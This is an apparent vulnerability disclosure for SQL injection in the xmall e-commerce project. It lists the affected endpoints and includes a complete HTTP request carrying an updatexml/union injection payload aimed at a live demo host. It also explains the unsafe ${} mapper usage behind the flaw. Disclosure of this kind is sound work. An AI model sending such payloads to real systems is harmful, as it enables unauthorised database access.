SQL Injection Vulnerability exists in multiple interfaces of xmall

[Tyaoo]

[Suggested description]
Xmall was discovered to contain a SQL injection vulnerability via the orderDir parameter.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/Exrick/xmall

[Affected Product Code Base]
all version

[Affected Component]

• /item/list
• /item/listSearch
• /sys/log
• /order/list
• /member/list (need time-based blind injection)
• /member/list/remove

[Attack Type]
Remote

[Vulnerability details]
Send the payload below to the interface /item/list

GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: xmadmin.exrick.cn
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Referer: http://xmadmin.exrick.cn/product-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Cookie: JSESSIONID=359A406116392BB0456356EFBCF068FC
Connection: close

[Impact Code execution]
true

[Cause of vulnerability]
In the /item/list interface, the order[0][dir] parameter is not filtered and passed into the getItemList function.

Then it is passed into the selectItemByCondition function.

In xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml, the orderDir parameter is used in ${} format, leading to a SQL injection vulnerability.

And there are the other similar interfaces:

• /item/listSearch
• /sys/log
• /order/list
• /member/list (need time-based blind injection)
• /member/list/remove (need time-based blind injection)

That's all, thanks.

[leopoldwalden]

您的邮件我已收到，祝您工作顺利、生活愉快。